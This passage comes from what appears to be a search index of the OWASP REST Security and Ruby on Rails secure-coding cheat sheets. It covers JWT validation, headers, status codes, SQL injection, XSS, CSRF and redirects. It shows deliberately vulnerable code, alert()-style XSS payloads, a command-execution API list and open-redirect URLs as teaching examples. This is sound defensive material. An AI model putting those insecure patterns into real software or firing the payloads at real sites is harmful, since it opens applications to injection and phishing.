"},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#related-resources","title":"Related Resources","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html","title":"REST Security Cheat Sheet","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

REST (or REpresentational State Transfer) is an architectural style first described in Roy Fielding's Ph.D. dissertation on Architectural Styles and the Design of Network-based Software Architectures.

It evolved as Fielding wrote the HTTP/1.1 and URI specs and has been proven to be well-suited for developing distributed hypermedia applications. While REST is more widely applicable, it is most commonly used within the context of communicating with services via HTTP.

The key abstraction of information in REST is a resource. A REST API resource is identified by a URI, usually a HTTP URL. REST components use connectors to perform actions on a resource by using a representation to capture the current or intended state of the resource and transferring that representation.

The primary connector types are client and server; secondary connectors include cache, resolver and tunnel.

REST APIs are stateless. Stateful APIs do not adhere to the REST architectural style. State in the REST acronym refers to the state of the resource which the API accesses, not the state of a session within which the API is called. While there may be good reasons for building a stateful API, it is important to realize that managing sessions is complex and difficult to do securely.

Stateful services are out of scope of this Cheat Sheet: Passing state from client to backend, while making the service technically stateless, is an anti-pattern that should also be avoided as it is prone to replay and impersonation attacks.

In order to implement flows with REST APIs, resources are typically created, read, updated and deleted. For example, an ecommerce site may offer methods to create an empty shopping cart, to add items to the cart and to check out the cart. Each of these REST calls is stateless and the endpoint should check whether the caller is authorized to perform the requested operation.

Another key feature of REST applications is the use of standard HTTP verbs and error codes in the pursuit of removing unnecessary variation among different services.

Another key feature of REST applications is the use of HATEOAS or Hypermedia As The Engine of Application State. This provides REST applications a self-documenting nature making it easier for developers to interact with a REST service without prior knowledge.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#https","title":"HTTPS","text":"

Secure REST services must only provide HTTPS endpoints. This protects authentication credentials in transit, for example passwords, API keys or JSON Web Tokens. It also allows clients to authenticate the service and guarantees integrity of the transmitted data.

See the Transport Layer Protection Cheat Sheet for additional information.

Consider the use of mutually authenticated client-side certificates to provide additional protection for highly privileged web services.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#access-control","title":"Access Control","text":"

Non-public REST services must perform access control at each API endpoint. Web services in monolithic applications implement this by means of user authentication, authorization logic and session management. This has several drawbacks for modern architectures which compose multiple microservices following the RESTful style.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#jwt","title":"JWT","text":"

There seems to be a convergence towards using JSON Web Tokens (JWT) as the format for security tokens. JWTs are JSON data structures containing a set of claims that can be used for access control decisions. A cryptographic signature or message authentication code (MAC) can be used to protect the integrity of the JWT.

If MACs are used for integrity protection, every service that is able to validate JWTs can also create new JWTs using the same key. This means that all services using the same key have to mutually trust each other. Another consequence of this is that a compromise of any service also compromises all other services sharing the same key. See here for additional information.

The relying party or token consumer validates a JWT by verifying its integrity and the claims it contains.

Some claims have been standardized and should be present in JWT used for access controls. At least the following of the standard claims should be verified:

As JWTs contain details of the authenticated entity (user etc.) a disconnect can occur between the JWT and the current state of the users session, for example, if the session is terminated earlier than the expiration time due to an explicit logout or an idle timeout. When an explicit session termination event occurs, a digest or hash of any associated JWTs should be submitted to a block list on the API which will invalidate that JWT for any requests until the expiration of the token. See the JSON_Web_Token_for_Java_Cheat_Sheet for further details.
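
A sketch of such claim verification with the PyJWT library; the HS256 algorithm, issuer, audience and required-claims list are placeholder assumptions to be replaced with your own values.

import jwt   # third-party: pip install PyJWT

def validate(token: str, key: str) -> dict:
    # Rejects tokens with a bad signature, wrong issuer/audience, or a missing/expired exp claim.
    return jwt.decode(
        token,
        key,
        algorithms=["HS256"],                  # never let the token choose the algorithm
        issuer="https://issuer.example.com",   # placeholder
        audience="my-api",                     # placeholder
        options={"require": ["exp", "iss", "aud"]},
    )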

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#api-keys","title":"API Keys","text":"

Public REST services without access control run the risk of being farmed, leading to excessive bills for bandwidth or compute cycles. API keys can be used to mitigate this risk. They are also often used by organisations to monetize APIs; instead of blocking high-frequency calls, clients are given access according to a purchased access plan.

API keys can reduce the impact of denial-of-service attacks. However, when they are issued to third-party clients, they are relatively easy to compromise.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#restrict-http-methods","title":"Restrict HTTP methods","text":"

In Java EE in particular, this can be difficult to implement properly. See Bypassing Web Authentication and Authorization with HTTP Verb Tampering for an explanation of this common misconfiguration.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#input-validation","title":"Input validation","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#validate-content-types","title":"Validate content types","text":"

A REST request or response body should match the intended content type in the header. Otherwise this could cause misinterpretation at the consumer/producer side and lead to code injection/execution.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#validate-request-content-types","title":"Validate request content types","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#send-safe-response-content-types","title":"Send safe response content types","text":"

It is common for REST services to allow multiple response types (e.g. application/xml or application/json), and the client specifies the preferred order of response types with the Accept header in the request.

Services including script code (e.g. JavaScript) in their responses must be especially careful to defend against header injection attacks.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#management-endpoints","title":"Management endpoints","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#error-handling","title":"Error handling","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#audit-logs","title":"Audit logs","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#security-headers","title":"Security Headers","text":"

There are a number of security related headers that can be returned in the HTTP responses to instruct browsers to act in specific ways. However, some of these headers are intended to be used with HTML responses, and as such may provide little or no security benefits on an API that does not return HTML.

The following headers should be included in all API responses:

- Cache-Control: no-store - Prevent sensitive information from being cached.
- Content-Security-Policy: frame-ancestors 'none' - To protect against drag-and-drop style clickjacking attacks.
- Content-Type - To specify the content type of the response. This should be application/json for JSON responses.
- Strict-Transport-Security - To require connections over HTTPS and to protect against spoofed certificates.
- X-Content-Type-Options: nosniff - To prevent browsers from performing MIME sniffing, and inappropriately interpreting responses as HTML.
- X-Frame-Options: DENY - To protect against drag-and-drop style clickjacking attacks.

The headers below are only intended to provide additional security when responses are rendered as HTML. As such, if the API will never return HTML in responses, then these headers may not be necessary. However, if there is any uncertainty about the function of the headers, or the types of information that the API returns (or may return in future), then it is recommended to include them as part of a defence-in-depth approach.

- Content-Security-Policy (e.g. Content-Security-Policy: default-src 'none') - The majority of CSP functionality only affects pages rendered as HTML.
- Permissions-Policy (e.g. Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), cross-origin-isolated=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), keyboard-map=(), magnetometer=(), microphone=(), midi=(), navigation-override=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), sync-xhr=(), usb=(), web-share=(), xr-spatial-tracking=()) - This header used to be named Feature-Policy. When browsers heed this header, it is used to control browser features via directives. The example disables features with an empty allowlist for a number of permitted directive names. When you apply this header, verify that the directives are up-to-date and fit your needs. Please have a look at this article for a detailed explanation on how to control browser features.
- Referrer-Policy (e.g. Referrer-Policy: no-referrer) - Non-HTML responses should not trigger additional requests.
"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#cors","title":"CORS","text":"

Cross-Origin Resource Sharing (CORS) is a W3C standard to flexibly specify what cross-domain requests are permitted. By delivering appropriate CORS Headers your REST API signals to the browser which domains, AKA origins, are allowed to make JavaScript calls to the REST service.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#sensitive-information-in-http-requests","title":"Sensitive information in HTTP requests","text":"

RESTful web services should be careful to prevent leaking credentials. Passwords, security tokens, and API keys should not appear in the URL, as these can be captured in web server logs, which makes the logs themselves valuable to an attacker.

OK:

https://example.com/resourceCollection/[ID]/action

https://twitter.com/vanderaj/lists

NOT OK:

https://example.com/controller/123/action?apiKey=a53f435643de32 because the API key is in the URL.
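
As a hedged illustration (the endpoint and token value are taken from the examples above; the class name is made up), credentials belong in a header or the message body rather than in the URL, for example with Java's java.net.http.HttpClient:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class ApiClientExample {
    public static void main(String[] args) throws Exception {
        HttpClient client = HttpClient.newHttpClient();
        // The API key travels in the Authorization header, not in the URL,
        // so it does not end up in web server access logs.
        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://example.com/resourceCollection/123/action"))
                .header("Authorization", "Bearer a53f435643de32") // example value from the text
                .GET()
                .build();
        HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
        System.out.println(response.statusCode());
    }
}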

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#http-return-code","title":"HTTP Return Code","text":"

HTTP defines status codes. When designing a REST API, don't just use 200 for success or 404 for error. Always use the semantically appropriate status code for the response.

Here is a non-exhaustive selection of security-related REST API status codes. Use it to ensure you return the correct code.

Code | Message | Description
200 | OK | Response to a successful REST API action. The HTTP method can be GET, POST, PUT, PATCH or DELETE.
201 | Created | The request has been fulfilled and the resource created. A URI for the created resource is returned in the Location header.
202 | Accepted | The request has been accepted for processing, but processing is not yet complete.
301 | Moved Permanently | Permanent redirection.
304 | Not Modified | Caching-related response returned when the client has the same copy of the resource as the server.
307 | Temporary Redirect | Temporary redirection of the resource.
400 | Bad Request | The request is malformed, such as a message body format error.
401 | Unauthorized | Wrong or no authentication ID/password provided.
403 | Forbidden | Used when the authentication succeeded but the authenticated user doesn't have permission to access the requested resource.
404 | Not Found | When a non-existent resource is requested.
405 | Method Not Allowed | The error for an unexpected HTTP method. For example, the REST API is expecting HTTP GET, but HTTP PUT is used.
406 | Not Acceptable | The client presented a content type in the Accept header which is not supported by the server API.
413 | Payload Too Large | Use it to signal that the request size exceeded the given limit, e.g. regarding file uploads.
415 | Unsupported Media Type | The requested content type is not supported by the REST service.
429 | Too Many Requests | Used when a DoS attack may have been detected or the request is rejected due to rate limiting.
500 | Internal Server Error | An unexpected condition prevented the server from fulfilling the request. Be aware that the response should not reveal internal information that helps an attacker, e.g. detailed error messages or stack traces.
501 | Not Implemented | The REST service does not implement the requested operation yet.
503 | Service Unavailable | The REST service is temporarily unable to process the request. Used to inform the client it should retry at a later time.

Additional information about HTTP return code usage in REST API can be found here and here.
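
For illustration, a minimal sketch (the servlet and JSON bodies are hypothetical) of returning a semantically correct status code while keeping internal details out of the error response:

import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

public class AccountServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        try {
            // ... perform the lookup ...
            resp.setStatus(HttpServletResponse.SC_OK);
            resp.setContentType("application/json");
            resp.getWriter().write("{\"status\":\"ok\"}");
        } catch (Exception e) {
            // Log the detail server-side, but return only a generic message to the client.
            resp.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR);
            resp.setContentType("application/json");
            resp.getWriter().write("{\"error\":\"internal error\"}");
        }
    }
}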

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html","title":"Ruby on Rails Cheat Sheet","text":""},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheatsheet intends to provide quick, basic Ruby on Rails security tips for developers. It complements, augments, or emphasizes points brought up in the Rails security guide from the Rails core team.

The Rails framework abstracts developers from quite a bit of tedious work and provides the means to accomplish complex tasks quickly and with ease. New developers, those unfamiliar with the inner-workings of Rails, likely need a basic set of guidelines to secure fundamental aspects of their application. The intended purpose of this doc is to be that guide.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#items","title":"Items","text":""},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#command-injection","title":"Command Injection","text":"

Ruby offers a function called \"eval\" which will dynamically execute Ruby code supplied as Strings. It also has a number of ways to call system commands.

eval(\"ruby code here\")\nsystem(\"os command here\")\n`ls -al /` # (backticks contain os command)\nexec(\"os command here\")\nspawn(\"os command here\")\nopen(\"| os command here\")\nProcess.exec(\"os command here\")\nProcess.spawn(\"os command here\")\nIO.binread(\"| os command here\")\nIO.binwrite(\"| os command here\", \"foo\")\nIO.foreach(\"| os command here\") {}\nIO.popen(\"os command here\")\nIO.read(\"| os command here\")\nIO.readlines(\"| os command here\")\nIO.write(\"| os command here\", \"foo\")\n

While the power of these commands is quite useful, extreme care should be taken when using them in a Rails based application. Usually, it's just a bad idea. If need be, an allow-list of possible values should be used and any input should be validated as thoroughly as possible, as in the sketch below.
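
A minimal sketch, assuming a hypothetical report command and allow-list, of combining value validation with the multi-argument form of system, which does not pass its arguments through a shell:

ALLOWED_REPORTS = %w[daily weekly monthly].freeze

def generate_report(report_type)
  # Reject anything that is not explicitly allowed.
  raise ArgumentError, "unknown report type" unless ALLOWED_REPORTS.include?(report_type)

  # Multi-argument form: the arguments are passed directly to the command,
  # not interpreted by a shell.
  system("generate_report", "--type", report_type)
end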

The guides from Rails and OWASP contain further information on command injection.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

Ruby on Rails is often used with an ORM called ActiveRecord, though it is flexible and can be used with other data sources. Typically, very simple Rails applications use methods on the Rails models to query data. Many use cases are protected against SQL injection out of the box. However, it is possible to write code that allows for SQL injection.

name = params[:name]\n@projects = Project.where(\"name like '\" + name + \"'\");\n

The statement is injectable because the name parameter is not escaped.

Here is the idiom for building this kind of statement:

@projects = Project.where(\"name like ?\", \"%#{ActiveRecord::Base.sanitize_sql_like(params[:name])}%\")\n

Use caution not to build SQL statements based on user controlled input. A list of more realistic and detailed examples is here: rails-sqli.org. OWASP has extensive information about SQL Injection.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-site-scripting-xss","title":"Cross-site Scripting (XSS)","text":"

In Rails, protection against XSS is the default behavior. When string data is shown in views, it is escaped prior to being sent back to the browser. This goes a long way, but there are common cases where developers bypass this protection - for example, to enable rich text editing. In the event that you want to pass variables to the front end with tags intact, it is tempting to do the following in your .erb file (Ruby markup).

# Wrong! Do not do this!\n<%= raw @product.name %>\n\n# Wrong! Do not do this!\n<%== @product.name %>\n\n# Wrong! Do not do this!\n<%= @product.name.html_safe %>\n\n# Wrong! Do not do this!\n<%= content_tag @product.name %>\n

Unfortunately, any field that uses raw, html_safe, content_tag or similar methods like this will be a potential XSS target. Note that there are also widespread misunderstandings about html_safe().

This writeup describes the underlying SafeBuffer mechanism in detail. Other tags that change the way strings are prepared for output can introduce similar issues, including content_tag.

content_tag(\"/><script>alert('hack!');</script>\") # XSS example\n# produces: </><script>alert('hack!');</script>><//><script>alert('hack!');</script>>\n

The method html_safe of String is somewhat confusingly named. It means that we know for sure the content of the string is safe to include in HTML without escaping. This method itself is unsafe!

If you must accept HTML content from users, consider a markup language for rich text in an application (examples include Markdown and Textile) and disallow HTML tags. This helps ensure that the accepted input doesn't include HTML content that could be malicious.

If you cannot restrict your users from entering HTML, consider implementing a Content Security Policy to disallow the execution of any JavaScript. And finally, consider using the #sanitize method that lets you list allowed tags, as in the sketch below. Be careful, this method has been shown to be flawed numerous times and will never be a complete solution.
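
As an illustration (assuming a @comment object with a body attribute), the built-in Rails sanitize helper can be given an explicit allow-list of tags and attributes in a view:

<%# Only the listed tags and attributes survive; everything else is stripped. %>
<%= sanitize @comment.body, tags: %w(p br strong em a), attributes: %w(href) %>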

An often overlooked XSS attack vector for older versions of Rails is the href value of a link:

<%= link_to \"Personal Website\", @user.website %>\n

If @user.website contains a link that starts with javascript:, the content will execute when a user clicks the generated link:

<a href=\"javascript:alert('Haxored')\">Personal Website</a>\n

Newer Rails versions escape such links in a better way.

link_to \"Personal Website\", 'javascript:alert(1);'.html_safe()\n# Will generate:\n# \"<a href=\"javascript:alert(1);\">Personal Website</a>\"\n

Using Content Security Policy is one more security measure to forbid execution of links starting with javascript:.

Brakeman scanner helps in finding XSS problems in Rails apps.

OWASP provides more general information about XSS in a top level page: Cross-site Scripting (XSS).

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sessions","title":"Sessions","text":"

By default, Ruby on Rails uses a Cookie based session store. What that means is that unless you change something, the session will not expire on the server. That means that some default applications may be vulnerable to replay attacks. It also means that sensitive information should never be put in the session.

The best practice is to use a database based session, which thankfully is very easy with Rails:

Project::Application.config.session_store :active_record_store\n

There is a Session Management Cheat Sheet.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#authentication","title":"Authentication","text":"

As with all sensitive data, start securing your authentication by enabling TLS in your configuration:

# config/environments/production.rb\n# Force all access to the app over SSL, use Strict-Transport-Security,\n# and use secure cookies\nconfig.force_ssl = true\n

Uncomment line 3, as shown above, in your configuration.

Generally speaking, Rails does not provide authentication by itself. However, most developers using Rails leverage libraries such as Devise or AuthLogic to provide authentication.

To enable authentication it is possible to use the Devise gem.

Install it using:

gem\u00a0'devise'\n

Then run the Devise installer:

rails\u00a0generate\u00a0devise:install\n

Next, specify which resources (routes) require authenticated access in routes:

Rails.application.routes.draw do\nauthenticate :user do\nresources :something do  # these resource require authentication\n...\nend\nend\n\ndevise_for :users # sign-up/-in/out routes\n\nroot to: 'static#home' # no authentication required\nend\n

To enforce password complexity, it is possible to use the zxcvbn gem. Configure your user model with it:

class User < ApplicationRecord\ndevise :database_authenticatable,\n# other devise features, then\n:zxcvbnable\nend\n

And configure the required password complexity:

# in config/initializers/devise.rb\nDevise.setup do |config|\n# zxcvbn score for devise\nconfig.min_password_score = 4 # complexity score here.\n...\n

You can try out this PoC to learn more about it.

Next, the omniauth gem allows for multiple authentication strategies. Using it, one can configure secure authentication with Facebook, LDAP and many other providers. Read on here.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#token-authentication","title":"Token Authentication","text":"

Devise usually uses Cookies for authentication.

If token authentication is desired instead, it can be implemented with the devise_token_auth gem.

It supports multiple front end technologies, for example angular2-token.

This gem is configured similarly to the devise gem itself. It also requires omniauth as a dependency.

#\u00a0token-based\u00a0authentication\ngem\u00a0'devise_token_auth'\ngem\u00a0'omniauth'\n

Then a route is defined:

mount_devise_token_auth_for\u00a0'User',\u00a0at:\u00a0'auth'\n

And the User model is modified accordingly.

These actions can be done with one command:

rails\u00a0g\u00a0devise_token_auth:install\u00a0[USER_CLASS]\u00a0[MOUNT_PATH]\n

You may need to edit the generated migration to avoid unnecessary fields and/or field duplication depending on your use case.

Note: when you use only token authentication, there is no longer a need for CSRF protection in controllers. If you use both cookies and tokens, the paths where cookies are used for authentication must still be protected from forgery!

There is an Authentication Cheat Sheet.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#insecure-direct-object-reference-or-forceful-browsing","title":"Insecure Direct Object Reference or Forceful Browsing","text":"

By default, Ruby on Rails apps use a RESTful URI structure. That means that paths are often intuitive and guessable. To protect against a user trying to access or modify data that belongs to another user, it is important to specifically control actions. Out of the gate on a vanilla Rails application, there is no such built-in protection. It is possible to do this by hand at the controller level.

It is also possible, and probably recommended, to consider resource-based access control libraries such as cancancan (a cancan replacement) or pundit to do this; see the sketch below. This ensures that all operations on a database object are authorized by the business logic of the application.
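
As an illustration only (the model, action and ownership rule are made up, and Pundit is assumed to be installed and included in ApplicationController), a minimal Pundit policy plus controller check might look like:

# app/policies/project_policy.rb
# Assumes the ApplicationPolicy generated by `rails g pundit:install`,
# which exposes `user` and `record`.
class ProjectPolicy < ApplicationPolicy
  def show?
    # Only the owner of the project may view it.
    record.user_id == user.id
  end
end

# app/controllers/projects_controller.rb
class ProjectsController < ApplicationController
  def show
    @project = Project.find(params[:id])
    authorize @project # raises Pundit::NotAuthorizedError if show? returns false
  end
end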

More general information about this class of vulnerability is in the OWASP Top 10 Page.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#csrf-cross-site-request-forgery","title":"CSRF (Cross Site Request Forgery)","text":"

Ruby on Rails has specific, built-in support for CSRF tokens. To enable it, or ensure that it is enabled, find the base ApplicationController and look for a directive such as the following:

class ApplicationController < ActionController::Base\nprotect_from_forgery\n

Note that the syntax for this type of control includes a way to add exceptions. Exceptions may be useful for APIs or other reasons - but should be reviewed and consciously included. In the example below, the Rails ProjectController will not provide CSRF protection for the show method.

class ProjectController < ApplicationController\nprotect_from_forgery except: :show\n

Also note that by default Rails does not provide CSRF protection for any HTTP GET request.

Note: if you use token authentication only, there is no need to protect from CSRF in controllers like this. If cookie-based authentication is used on some paths, then the protection is still required on those paths.

There is a top level OWASP page for Cross-Site Request Forgery (CSRF).

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#redirects-and-forwards","title":"Redirects and Forwards","text":"

Web applications often require the ability to dynamically redirect users based on client-supplied data. To clarify, dynamic redirection usually entails the client including a URL in a parameter within a request to the application. Once received by the application, the user is redirected to the URL specified in the request.

For example:

http://www.example.com/redirect?url=http://www.example_commerce_site.com/checkout

The above request would redirect the user to http://www.example_commerce_site.com/checkout. The security concern associated with this functionality is leveraging an organization's trusted brand to phish users and trick them into visiting a malicious site, in our example, badhacker.com.

Example:

http://www.example.com/redirect?url=http://badhacker.com

The most basic, but restrictive protection is to use the :only_path option. Setting this to true will essentially strip out any host information. However, the :only_path option must be part of the first argument. If the first argument is not a hash table, then there is no way to pass in this option. In the absence of a custom helper or allow list, this is one approach that can work:

begin\nif path = URI.parse(params[:url]).path\nredirect_to path\nend\nrescue URI::InvalidURIError\nredirect_to '/'\nend\n

If matching user input against a list of approved sites or TLDs using regular expressions is a must, it makes sense to leverage a method such as URI.parse() to obtain the host, and then match that host value against your regular expression patterns. Those regular expressions must, at a minimum, have anchors, or there is a greater chance of an attacker bypassing the validation routine.

Example:

require 'uri'\nhost = URI.parse(\"#{params[:url]}\").host\n# this can be vulnerable to javascript://trusted.com/%0Aalert(0)\n# so check .scheme and .port too\nvalidation_routine(host) if host\ndef validation_routine(host)\n# Validation routine where we use  \\A and \\z as anchors *not* ^ and $\n# you could also check the host value against an allow list\nend\n

Blindly redirecting to a user-supplied parameter can also lead to XSS.

Example code:

redirect_to params[:to]\n

Will give this URL:

http://example.com/redirect?to[status]=200&to[protocol]=javascript:alert(0)//

The obvious fix for this type of vulnerability is to restrict to specific Top-Level Domains (TLDs), statically define specific sites, or map a key to its value.

Example code:

ACCEPTABLE_URLS = {\n'our_app_1' => \"https://www.example_commerce_site.com/checkout\",\n'our_app_2' => \"https://www.example_user_site.com/change_settings\"\n}\n

Will give this URL:

http://www.example.com/redirect?url=our_app_1

Redirection handling code:

def redirect\nurl = ACCEPTABLE_URLS[\"#{params[:url]}\"]\nredirect_to url if url\nend\n

There is a more general OWASP resource about unvalidated redirects and forwards.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#dynamic-render-paths","title":"Dynamic Render Paths","text":"

In Rails, controller actions and views can dynamically determine which view or partial to render by calling the render method. If user input is used in or for the template name, an attacker could cause the application to render an arbitrary view, such as an administrative page.

Care should be taken when using user input to determine which view to render. If possible, avoid any user input in the name or path to the view.
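
A minimal sketch (parameter and template names are hypothetical) of mapping user input to an allow-list instead of rendering it directly:

ALLOWED_PAGES = {
  "about"   => "static/about",
  "contact" => "static/contact"
}.freeze

def page
  template = ALLOWED_PAGES[params[:page]]
  if template
    render template
  else
    # Unknown values never reach the render call.
    head :not_found
  end
end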

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-origin-resource-sharing","title":"Cross Origin Resource Sharing","text":"

Occasionally, a need arises to share resources with another domain, for example a file-upload function that sends data via an AJAX request to another domain. In these cases, the same-origin rules followed by web browsers must be relaxed. Modern browsers, in compliance with HTML5 standards, will allow this to occur, but a couple of precautions must be taken.

When using a nonstandard HTTP construct, such as an atypical Content-Type header, for example, the following applies:

The receiving site should list only those domains allowed to make such requests, and should set the Access-Control-Allow-Origin header in both the response to the OPTIONS request and the response to the POST request. This is because the OPTIONS request is sent first, in order to determine if the remote or receiving site allows the requesting domain. Next, a second request, a POST request, is sent. Once again, the header must be set in order for the transaction to be shown as successful.

When standard HTTP constructs are used:

The request is sent and the browser, upon receiving a response, inspects the response headers in order to determine if the response can and should be processed.

Allow list in Rails:

Gemfile:

gem\u00a0'rack-cors',\u00a0:require\u00a0=>\u00a0'rack/cors'\n

config/application.rb:

module Sample\nclass Application < Rails::Application\nconfig.middleware.use Rack::Cors do\nallow do\norigins 'someserver.example.com'\nresource %r{/users/\\d+.json},\n:headers => ['Origin', 'Accept', 'Content-Type'],\n:methods => [:post, :get]\nend\nend\nend\nend\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#security-related-headers","title":"Security-related headers","text":"

To set a header value, simply access the response.headers object as a hash inside your controller (often in a before/after_filter).

response.headers['X-header-name']\u00a0=\u00a0'value'\n

Rails provides the default_headers functionality that will automatically apply the values supplied. This works for most headers in almost all cases.

ActionDispatch::Response.default_headers = {\n'X-Frame-Options' => 'SAMEORIGIN',\n'X-Content-Type-Options' => 'nosniff',\n'X-XSS-Protection' => '0'\n}\n

Strict Transport Security is a special case; it is set in an environment file (e.g. production.rb):

config.force_ssl\u00a0=\u00a0true\n

For those not on the edge, there is a library (secure_headers) that provides the same behavior, with a content security policy abstraction included. It will automatically apply logic based on the user agent to produce a concise set of headers.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#business-logic-bugs","title":"Business Logic Bugs","text":"

Any application in any technology can contain business logic errors that result in security bugs. Business logic bugs are difficult or impossible to detect using automated tools. The best ways to prevent business logic security bugs are to do code reviews, pair program and write unit tests.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#attack-surface","title":"Attack Surface","text":"

Generally speaking, Rails avoids open redirect and path traversal types of vulnerabilities because of its /config/routes.rb file which dictates what URLs should be accessible and handled by which controllers. The routes file is a great place to look when thinking about the scope of the attack surface.

An example might be as follows:

#\u00a0this\u00a0is\u00a0an\u00a0example\u00a0of\u00a0what\u00a0NOT\u00a0to\u00a0do\nmatch\u00a0':controller(/:action(/:id(.:format)))'\n

In this case, this route allows any public method on any controller to be called as an action. As a developer, you want to make sure that users can only reach the controller methods intended and in the way intended.
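
By contrast, a minimal sketch (resource names are made up) of explicitly limiting which actions are routable:

Rails.application.routes.draw do
  # Expose only the actions that are actually intended to be reachable.
  resources :projects, only: [:index, :show]
  resources :comments, only: [:create]
end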

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sensitive-files","title":"Sensitive Files","text":"

Many Ruby on Rails apps are open source and hosted on publicly available source code repositories. Whether that is the case or the code is committed to a corporate source control system, there are certain files that should be either excluded or carefully managed.

/config/database.yml\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0-\u00a0\u00a0May\u00a0contain\u00a0production\u00a0credentials.\n/config/initializers/secret_token.rb\u00a0-\u00a0\u00a0Contains\u00a0a\u00a0secret\u00a0used\u00a0to\u00a0hash\u00a0session\u00a0cookie.\n/db/seeds.rb\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0-\u00a0\u00a0May\u00a0contain\u00a0seed\u00a0data\u00a0including\u00a0bootstrap\u00a0admin\u00a0user.\n/db/development.sqlite3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0-\u00a0\u00a0May\u00a0contain\u00a0real\u00a0data.\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#encryption","title":"Encryption","text":"

Rails uses OS encryption. Generally speaking, it is always a bad idea to write your own encryption.

Devise by default uses bcrypt for password hashing, which is an appropriate solution.

Typically, the following config in /config/initializers/devise.rb sets 10 stretches for production:

config.stretches\u00a0=\u00a0Rails.env.test?\u00a0?\u00a01\u00a0:\u00a010\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#updating-rails-and-having-a-process-for-updating-dependencies","title":"Updating Rails and Having a Process for Updating Dependencies","text":"

In early 2013, a number of critical vulnerabilities were identified in the Rails Framework. Organizations that had fallen behind current versions had more trouble updating and harder decisions along the way, including patching the source code for the framework itself.

An additional concern with Ruby applications in general is that most libraries (gems) are not signed by their authors. Because of this, it is effectively impossible to build a Rails based project exclusively with libraries whose provenance can be verified. One good practice might be to audit the gems you are using.

In general, it is important to have a process for updating dependencies. An example process might define three mechanisms for triggering an update or response:

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#tools","title":"Tools","text":"

Use brakeman, an open source code analysis tool for Rails applications, to identify many potential issues. It will not necessarily produce comprehensive security findings, but it can find easily exposed issues. A great way to see potential issues in Rails is to review the brakeman documentation of warning types.

A newer alternative is bearer, an open source code security and privacy analysis tool for both Ruby and JavaScript/TypeScript code, which identifies a broad range of OWASP Top 10 potential issues. It provides many configuration options and can easily integrate into your CI/CD pipeline.

There are emerging tools that can be used to track security issues in dependency sets, like automated scanning from GitHub and GitLab.

Another area of tooling is the security testing tool Gauntlt which is built on cucumber and uses gherkin syntax to define attack files.

Launched in May 2013 and very similar to the brakeman scanner, the dawnscanner rubygem is a static analyzer for security issues that works with Rails, Sinatra and Padrino web applications. Version 1.6.6 has more than 235 Ruby-specific CVE security checks.

